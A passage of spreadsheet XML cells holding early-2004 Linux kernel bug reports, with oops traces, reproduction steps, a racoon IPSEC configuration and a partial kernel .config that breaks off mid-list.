    <t>2004-01-28 16:21 UTC</t>
  </si>
  <si>
    <t>2016-07-22 11:20 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE Linux 7.3 Hardware Environment: Athlonx-XP/PIII Software Environment: Problem Description: Steps to reproduce: if I start gmplayer (mplayer) for the first time from my freshly nfs-mounted home directory it reports "Reading config file /home/test/.mplayer/config No such file or directory" /home/test/.mplayer is a symlink: .mplayer -&gt; .mplayer__/ /home/test/.mplayer__/config does exist though. Therefore gmplayer starts with compiled-in defaults instead of those stored after the last run. If successively starting gmplayer again it eventually finds the config-file and reads it. The problem occurs only with 2.6.1 (plain) as client and both 2.6.1 with nfs patch (#1869) and plain 2.4.24 as server. export/mount-parameter: o export home directories, in /etc/exports: /home comp1 (rw,no_root_squash) o import on comp1, in /etc/fstab: serv1:/home /home nfs defaults,bg,rsize=8192,wsize=8192 0 0</t>
  </si>
  <si>
    <t>boot fails after Kernel unpacking</t>
  </si>
  <si>
    <t>2004-01-30 08:41 UTC</t>
  </si>
  <si>
    <t>Benedikt Spranger</t>
  </si>
  <si>
    <t>2004-07-08 14:33 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: Athlon SMP Software Environment: gcc-Version 3.3.3 20040110 (prerelease) (Debian) Problem Description: Kernel hangs after the Message "Uncompressing Linux..." Same config works fine compiled with an older compiler (debian gcc ~Dec 2003, don</t>
  </si>
  <si>
    <t>Matthew Garrett</t>
  </si>
  <si>
    <t>Bluetooth stack crashes kernel</t>
  </si>
  <si>
    <t>2004-02-01 18:14 UTC</t>
  </si>
  <si>
    <t>2004-02-02 07:59 UTC</t>
  </si>
  <si>
    <t>other_modules</t>
  </si>
  <si>
    <t>Distribution: - Hardware Environment: x86 PC Software Environment: Linux sarkovy.koeller.dyndns.org 2.6.1 #1 Sat Jan 10 01:54:59 CET 2004 i686 unknown Gnu C 3.3.2 Gnu make 3.80 util-linux 2.11z mount 2.11z module-init-tools 0.9.15-pre2 e2fsprogs 1.33 nfs-utils 1.0.3 awk: cmd. line:2: (FILENAME=- FNR=1) fatal: attempt to access field -1 Dynamic linker (ldd) 2.3.2 Procps 3.1.9 Net-tools 1.52 Kbd 1.10 Sh-utils 2.0 Modules Loaded snd_dummy snd_via82xx snd_pcm snd_timer snd_ac97_codec snd_page_alloc snd_mpu401_uart snd_rawmidi snd_seq_device snd hci_usb bluetooth uhci_hcd usbcore cls_fw sch_htb ipt_tos ipt_mark ipt_MARK ipt_TOS iptable_mangle ipt_MASQUERADE iptable_nat ipt_TCPMSS ipt_pkttype ipt_length ipt_multiport ipt_REJECT ipt_LOG ipt_limit ipt_state iptable_filter ip_tables ip_conntrack_ftp ip_conntrack pppoe pppox af_packet ppp_generic slhc epic100 mii crc32 Problem Description: I am using a bluetooth adapter connected via USB. When uploading data from a bluetooth device the kernel frequently crashes, like so (please note that I wrote this down from the screen and typed it in again, so there may be errors): kernel BUG at include/linux/module.h:296! invalid operand: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c8944753&gt;] Not tainted EFLAGS: 00010246 EIP is at l2cap_sock_alloc+0xc3/0xe0 [l2cap] eax: 00000000 ebx: c261c080 ecx: 00000000 edx: c261c080 esi: 00000000 edi: c3a85980 ebp: c3a85980 esp: c02ddce0 ds: 007b es: 007b ss: 0068 Process swapper (pid: 0, threadinfo=c02dc000 task=c027fb20) Stack: c894a280 00000000 00000024 00000020 c02dc000 c3f359d4 c89466b8 00000000 00000000 00000020 c8859b4c c3b00028 c3a85200 c88912d5 c3a85200 00000014 c02ddd3c 00000014 c261cbc0 00100030 0000008a 00000000 00000004 c118a81c Call Trace: [&lt;c89466b8&gt;] l2cap_recv_frame+0x518/0xe00 [l2cap] [&lt;c88912d5&gt;] tcp_match+0x75/0x170 [ip_tables] [&lt;c88a206b&gt;] match+0x6b/0xd0 [ip_multiport] [&lt;c889e017&gt;] match+0x17/0x50 [ipt_state] [&lt;c888f292&gt;] ipt_do_table+0x262/0x340 [ipt_tables] [&lt;c021c9c0&gt;] ip_local_deliver_finish+0x0/0x150 [&lt;c01ccbd8&gt;] get_device+0x18/0x30 [&lt;c88edcf7&gt;] uhci_submit_common+0x1f7/0x2b0 [uhci_hcd] [&lt;c8904d8a&gt;] hcd_submit_urb+0xfa/0x170 [usbcore] [&lt;c8905811&gt;] usb_submit_urb+0x1d1/0x250 [usbcore] [&lt;c88e1255&gt;] hci_usb_rx_complete+0x1a5/0x6e0 [hci_usb] [&lt;c89474e1&gt;] l2cap_recv_acldata+0x181/0x340 [l2cap] [&lt;c892f117&gt;] hci_rx_task+0x1a7/0x340 [bluetooth] [&lt;c011fcb6&gt;] tasklet_action+0x46/0x70 [&lt;c011fad0&gt;] do_softirq+0x90/0xa0 [&lt;c010b56d&gt;] do_IRQ+0xfd/0x130 [&lt;c0105000&gt;] _stext+0x0/0x60 [&lt;c01098a4&gt;] common_interrupt+0x18/0x20 [&lt;c0105000&gt;] _stext+0x0/0x60 [&lt;c0106c13&gt;] default_idle+0x23/0x30 [&lt;c0106c7c&gt;] cpu_idle+0x2c/0x40 [&lt;c02de707&gt;] start_kernel+0x147/0x160 [&lt;c02de480&gt;] unknown_bootoption+0x0/0x100 Code: 0f 0b 28 01 6f 79 94 c8 eb 95 0f 0b cb 01 86 79 94 c8 e9 69 &lt;0&gt;Kernel panic: Fatal exception in interrupt In interrupt handler - not syncing Steps to reproduce: /home/thomas $ hcid /home/thomas $ sdpd /home/thomas $ sdptool add --channel=10 OPUSH OBEX Object Push service registered At this point I start uploading images taken with a cellphone camera. The crash usually occurs after uploading 4..5 images.</t>
  </si>
  <si>
    <t>power button crashes kernel acpi_ev_gpe_detect()</t>
  </si>
  <si>
    <t>tested on 2.6.2-rc3, happening also in 2.4 since 2.4.22</t>
  </si>
  <si>
    <t>2004-02-02 13:36 UTC</t>
  </si>
  <si>
    <t>Santiago Garc</t>
  </si>
  <si>
    <t>2004-04-09 18:06 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Woody with backports from development Debian Hardware Environment: UP Pentium MMX with an i430TX chipset Software Environment: running acpid 1.0.1-3 Problem Description: ACPI power off (on halt) and other things seem to work ok, however hitting the power button makes the kernel crash with a message like this: Unable to handle kernel NULL pointer dereference at virtual address 00000008 printing eip: c019a0eb *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c019a0eb&gt;] Not tainted EFLAGS: 00010292 EIP is at acpi_ev_gpe_detect+0x23/0x120 eax: c02b4000 ebx: 00000000 ecx: 00000120 edx: 00000111 esi: 00000000 edi: 00000000 ebp: 00000009 esp: c02b5f10 ds: 007b es: 007b ss: 0068 Process swapper (pid: 0, threadinfo=c02b4000 task=c027cbc0) Stack: 00000000 00000000 00000000 00000009 c019863d 00000002 00000000 04000001 00000000 00000120 c0198b13 00000000 c7f94d20 04000001 c01944c9 00000000 c010a303 00000009 c01944bc c02b5f9c c02b4000 c02b4000 00000009 c02b5f94 Call Trace: [&lt;c019863d&gt;] acpi_ev_fixed_event_detect+0x51/0x68 [&lt;c0198b13&gt;] acpi_ev_sci_xrupt_handler+0x13/0x20 [&lt;c01944c9&gt;] acpi_irq+0xd/0x1c [&lt;c010a303&gt;] handle_IRQ_event+0x2b/0x50 [&lt;c01944bc&gt;] acpi_irq+0x0/0x1c [&lt;c010a5f1&gt;] do_IRQ+0x95/0x134 [&lt;c0105000&gt;] _stext+0x0/0x58 [&lt;c0108fc8&gt;] common_interrupt+0x18/0x20 [&lt;c0106e10&gt;] default_idle+0x0/0x2c [&lt;c0105000&gt;] _stext+0x0/0x58 [&lt;c0106e36&gt;] default_idle+0x26/0x2c [&lt;c0106eab&gt;] cpu_idle+0x2b/0x3c [&lt;c0105055&gt;] _stext+0x55/0x58 [&lt;c02b65e0&gt;] start_kernel+0x148/0x150 Code: 8b 73 08 85 f6 0f 84 d5 00 00 00 c7 44 24 18 00 00 00 00 8b &lt;0&gt;Kernel panic: Fatal exception in interrupt In interrupt handler - not syncing Steps to reproduce: having ACPI with power button compiled in and acpid running you just need to hit the power button and you get the crash (doesn't matter if the kernel is preemtive or not) I'll add the rest of the requested info as soon as I find out how to attach it, I see no way to attach it from here :-?</t>
  </si>
  <si>
    <t>Kernel oops after suspend/resume</t>
  </si>
  <si>
    <t>2.6.1 to 2.6.2-rc3-bk3</t>
  </si>
  <si>
    <t>2004-02-03 09:50 UTC</t>
  </si>
  <si>
    <t>Alex Warg</t>
  </si>
  <si>
    <t>2004-05-06 07:48 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian (unstable) Hardware Environment: IBM T40p Software Environment: linux 2.6.2-rc3-bk3 with ACPI enabled Problem Description: Kernel oops after suspend/resume (to ram) and reinsterion of ehci-hcd module. The dmesg output can be found on http://os.inf.tu-dresden.de/~aw11/linux-bug.txt Steps to reproduce: 1. Remove usb modules uhci-hcd and ehci-hcd 2. do suspend/resume cycle (echo -n 3 &gt;/proc/acpi/sleep) 3. insert usb modules (modprobe ehci-hcd)</t>
  </si>
  <si>
    <t>radeonfb init causes kernel oops</t>
  </si>
  <si>
    <t>2.6.1-2.6.2-rc3</t>
  </si>
  <si>
    <t>2004-02-03 11:26 UTC</t>
  </si>
  <si>
    <t>Clinton Ebadi</t>
  </si>
  <si>
    <t>2005-08-15 17:43 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: Dual Athlon MP 2800+, Radeon 9100 (R200 QM), Gigabyte 7DPXDW-P motherboard (AMD 760 MPX chipset) Software Environment: Problem Description: When booting with every kernel I tested (2.6.1 through 2.6.2-rc3 with and without -mm patches), the kernel oopses before the framebuffer inits. Everything works fine using a Radeon 7500 and the machine boots with the Radeon 9100 when using 2.6.0-mm1 compiled for my old machine (k6-2, nosmp). Steps to reproduce: Boot with radeonfb enabled, the kernel oopses as soon as the fb attempts to init. Alternatively, disable radeonfb and the kernel oopses when X starts (at least it seems this way because the machine locks up hard; even alt-sysrq-b doesn't do anything).</t>
  </si>
  <si>
    <t>Kernel hang on heavy disk access, PDC 20376</t>
  </si>
  <si>
    <t>2.6.2rc3</t>
  </si>
  <si>
    <t>2004-02-04 03:15 UTC</t>
  </si>
  <si>
    <t>Gunnlaugur Thor Briem</t>
  </si>
  <si>
    <t>2004-11-30 23:08 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 2004.0 Hardware Environment: MSI K7N2 Delta-ILSR (nforce2, Promise 20376 SATA rev 2), AMD Athlon XP 3200+, 1GB DDR RAM (2 x 512), 2x WD Raptor 74G SATA HD, MSI GeForce FX 5900 (128MB), some CDRW/DVD Software Environment: Fresh Gentoo build optimised for Athlon-XP (GCC 3.2.3 -march athlon-xp). 2.6.2rc3 vanilla kernel (also tried 2.6.1 gentoo patched for forcedeth, same results). Problem Description: At even short periods of heavy disk activity, the kernel suddenly hangs. Machine does not respond to keyboard events or ping, or anything other than a hard reset. I get it every time in bonnie++ test, and often in copying large directory trees, compiling the kernel, etc. ... but it often gets through the latter without problems, too. Steps to reproduce: Run bonnie++ -u nobody; that seems to be the most reliable way to reproduce it. Extra info: With ATA_DEBUG and ATA_VERBOSE_DEBUG #defined in libata.h, this is what I get in /var/log/messages just before things go awry: Jan 31 03:29:44 leggiero ata_fill_sg: PRD[22] = (0xAEDC000, 0x1000) Jan 31 03:29:44 leggiero ata_fill_sg: PRD[23] = (0x36EFA000, 0x1000) Jan 31 03:29:44 leggiero ata_fill_sg: PRD[24] = (0x36EF0000, 0x1000) Jan 31 03:29:44 leggiero pdc_dma_start: ENTER, ap c1bfd204 Jan 31 03:29:44 leggiero ata_scsi_rw_queue: EXIT Jan 31 03:29:44 leggiero pdc_interrupt: ENTER Jan 31 03:29:44 leggiero pdc_interrupt: port 0 Jan 31 03:29:44 leggiero ata_sg_clean: unmapping 25 sg elements Jan 31 03:29:44 leggiero pdc_interrupt: port 1 Jan 31 03:29:44 leggiero pdc_interrupt: EXIT Jan 31 03:29:44 leggiero ata_scsi_queuecmd: CDB (1:0,0,0) 2a 00 02 61 9c 8a 00 00 68 Jan 31 03:29:44 leggiero ata_scsi_rw_queue: ENTER Jan 31 03:29:44 leggiero ata_scsi_rw_xlat: writing Jan 31 03:29:44 leggiero ata_scsi_rw_xlat: ten-byte command Jan 31 03:29:44 leggiero ata_dev_select: ENTER, ata1: device 0, wait 1 Jan 31 03:29:44 leggiero ata_sg_setup: ENTER, ata1, use_sg 13 Jan 31 03:29:44 leggiero ata_sg_setup: 13 sg elements mapped Jan 31 03:29:44 leggiero pdc_fill_sg: ENTER Jan 31 03:29:44 leggiero ata_fill_sg: PRD[0] = (0x139DF000, 0x1000) Jan 31 03:29:44 leggiero ata_fill_sg: PRD[1] = (0x139D5000, 0x1000) Jan 31 03:29:44 leggiero ata_fill_sg: PRD[2] = (0x13C01000, 0x1000) Jan 31 03:29:44 leggiero ata_fill_sg: PRD[3] = (0x13D45000, 0x1000) After this, I get a couple of thousand zero bytes, and about four megabytes of garbage (including my kernel config and some data that was probably in the in-memory cache from other files), followed by the syslog startup message from the next boot. Presumably a DMA transfer went haywire and ended up in /var/log/messages, just before everything hung. No telling what other interesting stuff happened on the disk as well :) Note that, in the last operation, the ata_fill_sg loop should run 13 times, but we don't hear from it after the fourth time. Of course, this is an unreliable hint -- the failure might well happen somewhere completely different, and the last (crucial) bit of log output just never made it onto the disk. I'm not sure whether these messages are flushed to disk synchronously -- presumably you are. I'm using syslog-ng. Filed this originally on Bug 1888 by mistake -- that bug report involves a different chipset and driver, so this warrants a separate bug.</t>
  </si>
  <si>
    <t>2.6.2 kernel panic when using IPSEC</t>
  </si>
  <si>
    <t>2004-02-04 12:48 UTC</t>
  </si>
  <si>
    <t>Len Padilla</t>
  </si>
  <si>
    <t>2004-02-05 12:07 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Stable Hardware Environment: P-II 350, IDE Software Environment: Problem Description: I upgraded to 2.6.2 today (from 2.6.1) and got a kernel panic as soon sa I started using IPSEC (same config as I have been using with 2.6.1). Following is the console output: Unable to handle kernel NULL pointer dereference at virtual address 00000000 *pde = 00000000 Oops: 0002 [#1] CPU: 0 EIP: 0060:[&lt;c0117231&gt;] Not tainted EFLAGS: 00010082 EIP is at schedule+0x139/0x4f4 eax: 00000001 ebx: 00000000 ecx: c0311d80 edx: c0311d60 esi: c0311d60 edi: c0311f28 ebp: c0389d70 esp: c0389d30 ds: 007b es: 007b ss: 0068 Process swapper (pid: 0, threadinfo=c0388000 task=c0311d60) Stack: c0388000 c0389db0 c0389dc4 c81a8cc0 c81a8cc0 cf1f62e0 00000002 cf1f62e0 c0389e00 c0389dfc 00000246 0926bf51 9530848e 000006f2 c0311d60 c0311f28 c0389dd4 c02a294d c0389df4 c81a8cc0 c81a8cc0 00000002 00029d00 00000003 Call Trace: [&lt;c02a294d&gt;] xfrm_lookup+0x1ed/0x45c [&lt;c0117630&gt;] default_wake_function+0x0/0x1c [&lt;c0117630&gt;] default_wake_function+0x0/0x1c [&lt;c02a2be6&gt;] _decode_session+0x2a/0x40 [&lt;c02a3283&gt;] __xfrm_route_forward+0x2f/0x48 [&lt;c0273be7&gt;] ip_forward+0x97/0x234 [&lt;c0272dc9&gt;] ip_rcv_finish+0x1fd/0x244 [&lt;c0267cc8&gt;] nf_hook_slow+0xcc/0x124 [&lt;c02729da&gt;] ip_rcv+0x3ee/0x430 [&lt;c0272bcc&gt;] ip_rcv_finish+0x0/0x244 [&lt;c025e8c4&gt;] netif_receive_skb+0x150/0x1a8 [&lt;c025e98d&gt;] process_backlog+0x71/0x104 [&lt;c025ea92&gt;] net_rx_action+0x72/0x11c [&lt;c011e0fe&gt;] do_softirq+0x4e/0xa0 [&lt;c010afd1&gt;] do_IRQ+0x115/0x130 [&lt;c0106f14&gt;] default_idle+0x0/0x34 [&lt;c0105000&gt;] _stext+0x0/0x5c [&lt;c01097fc&gt;] common_interrupt+0x18/0x20 [&lt;c0106f14&gt;] default_idle+0x0/0x34 [&lt;c0105000&gt;] _stext+0x0/0x5c [&lt;c0106f3a&gt;] default_idle+0x26/0x34 [&lt;c0106fc5&gt;] cpu_idle+0x31/0x40 [&lt;c0105055&gt;] _stext+0x55/0x5c [&lt;c038a6aa&gt;] start_kernel+0x176/0x17c Code: ff 0b 8b 51 04 8b 46 20 89 50 04 89 02 c7 46 20 00 01 10 00 &lt;0&gt;Kernel panic: Fatal exception in interrupt In interrupt handler - not syncing attached is the racoon.conf I'm using (aaa.bbb.ccc.ddd, eee.fff.ggg.hhh and iii.jjj.kkk.lll are ip addresses): path include "/usr/local/etc/racoon" ; path pre_shared_key "/usr/local/etc/racoon/psk.txt" ; #log debug; listen { isakmp aaa.bbb.ccc.ddd[500]; } remote eee.fff.ggg.hhh { exchange_mode main; proposal { encryption_algorithm 3des; hash_algorithm sha1; authentication_method pre_shared_key; dh_group modp1024; } } sainfo address 172.31.0.0/24 any address iii.jjj.kkk.lll/27 any { pfs_group modp1024; encryption_algorithm 3des; authentication_algorithm hmac_sha1; compression_algorithm deflate; } # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # # CONFIG_EXPERIMENTAL is not set CONFIG_CLEAN_COMPILE=y CONFIG_STANDALONE=y CONFIG_BROKEN_ON_SMP=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y # CONFIG_BSD_PROCESS_ACCT is not set CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 # CONFIG_IKCONFIG is not set # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y # CONFIG_CC_OPTIMIZE_FOR_SIZE is not set # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y CONFIG_KMOD=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set CONFIG_MPENTIUMII=y # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set # CONFIG_MK7 is not set # CONFIG_MK8 is not set # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=5 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y # CONFIG_HPET_TIMER is not set # CONFIG_HPET_EMULATE_RTC is not set # CONFIG_SMP is not set CONFIG_PREEMPT=y CONFIG_X86_UP_APIC=y CONFIG_X86_UP_IOAPIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y # CONFIG_X86_MCE_P4THERMAL is not set # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set # CONFIG_X86_MSR is not set # CONFIG_X86_CPUID is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y # CONFIG_EFI is not set CONFIG_HAVE_DEC_LOCK=y # # Power management options (ACPI, APM) # # CONFIG_PM is not set # # ACPI (Advanced Configuration and Power Interface) Support # CONFIG_ACPI=y CONFIG_ACPI_BOOT=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_FAN=y CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_TOSHIBA is not set # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_BUS=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y # CONFIG_ACPI_RELAXED_AML is not set # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y # CONFIG_PCI_USE_VECTOR is not set CONFIG_PCI_LEGACY_PROC=y CONFIG_PCI_NAMES=y CONFIG_ISA=y # CONFIG_EISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set CONFIG_HOTPLUG=y # # PCMCIA/CardBus support # # CONFIG_PCMCIA is not set CONFIG_PCMCIA_PROBE=y # # PCI Hotplug Support # # # Executable file formats # CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=m CONFIG_BINFMT_MISC=m # # Device Drivers # # # Generic Driver Options # # CONFIG_FW_LOADER is not set # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=m CONFIG_PARPORT_PC=m CONFIG_PARPORT_PC_CML1=m # CONFIG_PARPORT_SERIAL is not set # CONFIG_PARPORT_OTHER is not set # CONFIG_PARPORT_1284 is not set # # Plug and Play support # CONFIG_PNP=y # CONFIG_PNP_DEBUG is not set # # Protocols # # # Block devices # CONFIG_BLK_DEV_FD=y # CONFIG_BLK_DEV_XD is not set # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set CONFIG_BLK_DEV_LOOP=m CONFIG_BLK_DEV_CRYPTOLOOP=m CONFIG_BLK_DEV_NBD=m CONFIG_BLK_DEV_RAM=m CONFIG_BLK_DEV_RAM_SIZE=4096 CONFIG_BLK_DEV_INITRD=y CONFIG_LBD=y # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y # CONFIG_IDEDISK_STROKE is not set CONFIG_BLK_DEV_IDECD=m CONFIG_BLK_DEV_IDEFLOPPY=m CONFIG_BLK_DEV_IDESCSI=m # CONFIG_IDE_TASK_IOCTL is not set # # IDE chipset support/bugfixes # # CONFIG_BLK_DEV_CMD640 is not set # CONFIG_BLK_DEV_IDEPNP is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=y # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set CONFIG_BLK_DEV_PIIX=y # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_IDE_CHIPSETS is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set CONFIG_IDEDMA_AUTO=y # CONFIG_DMA_NONPCI is not set # CONFIG_BLK_DEV_HD is not set # # SCSI device support # CONFIG_SCSI=m CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=m # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set CONFIG_BLK_DEV_SR=m # CONFIG_BLK_DEV_SR_VENDOR is not set CONFIG_CHR_DEV_SG=m # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # # CONFIG_SCSI_MULTI_LUN is not set CONFIG_SCSI_REPORT_LUNS=y # CONFIG_SCSI_CONSTANTS is not set # CONFIG_SCSI_LOGGING is not set # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_7000FASST is not set # CONFIG_SCSI_ACARD is not set CONFIG_SCSI_AHA152X=m # CONFIG_SCSI_AHA1542 is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_IN2000 is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_CPQFCTS is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_DTC3280 is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_GENERIC_NCR5380 is not set # CONFIG_SCSI_GENERIC_NCR5380_MMIO is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_NCR53C406A is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_PAS16 is not set # CONFIG_SCSI_PSI240I is not set # CONFIG_SCSI_QLOGIC_FAS is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set # CONFIG_SCSI_SYM53C416 is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_T128 is not set # CONFIG_SCSI_U14_34F is not set # CONFIG_SCSI_ULTRASTOR is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # # Old CD-ROM drivers (not SCSI, not IDE) # # CONFIG_CD_NO_IDESCSI is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # # I2O device support # # CONFIG_I2O is not set # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y CONFIG_PACKET_MMAP=y CONFIG_NETLINK_DEV=y CONFIG_UNIX=y CONFIG_NET_KEY=y CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_IP_MROUTE is not set # CONFIG_INET_ECN is not set CONFIG_SYN_COOKIES=y CONFIG_INET_AH=m CONFIG_INET_ESP=m CONFIG_INET_IPCOMP=m # # IP: Virtual Server Configuration # # CONFIG_IP_VS is not set # CONFIG_DECNET is not set # CONFIG_BRIDGE is not set CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=m CONFIG_IP_NF_FTP=m CONFIG_IP_NF_IRC=m CONFIG_IP_NF_TFTP=m CONFIG_IP_NF_AMANDA=m CONFIG_IP_NF_QUEUE=m CONFIG_IP_NF_IPTABLES=m CONFIG_IP_NF_MATCH_LIMIT=m CONFIG_IP_NF_MATCH_IPRANGE=m CONFIG_IP_NF_MATCH_MAC=m CONFIG_IP_NF_MATCH_PKTTYPE=m CONFIG_IP_NF_MATCH_MARK=m CONFIG_IP_NF_MATCH_MULTIPORT=m CONFIG_IP_NF_MATCH_TOS=m CONFIG_IP_NF_MATCH_RECENT=m CONFIG_IP_NF_MATCH_ECN=m CONFIG_IP_NF_MATCH_DSCP=m CONFIG_IP_NF_MATCH_AH_ESP=m CONFIG_IP_NF_MATCH_LENGTH=m CONFIG_IP_NF_MATCH_TTL=m CONFIG_IP_NF_MATCH_TCPMSS=m CONFIG_IP_NF_MATCH_HELPER=m CONFIG_IP_NF_MATCH_STATE=m CONFIG_IP_NF_MATCH_CONNTRACK=m CONFIG_IP_NF_MATCH_OWNER=m CONFIG_IP_NF_FILTER=m CONFIG_IP_NF_TARGET_REJECT=m CONFIG_IP_NF_NAT=m CONFIG_IP_NF_NAT_NEEDED=y 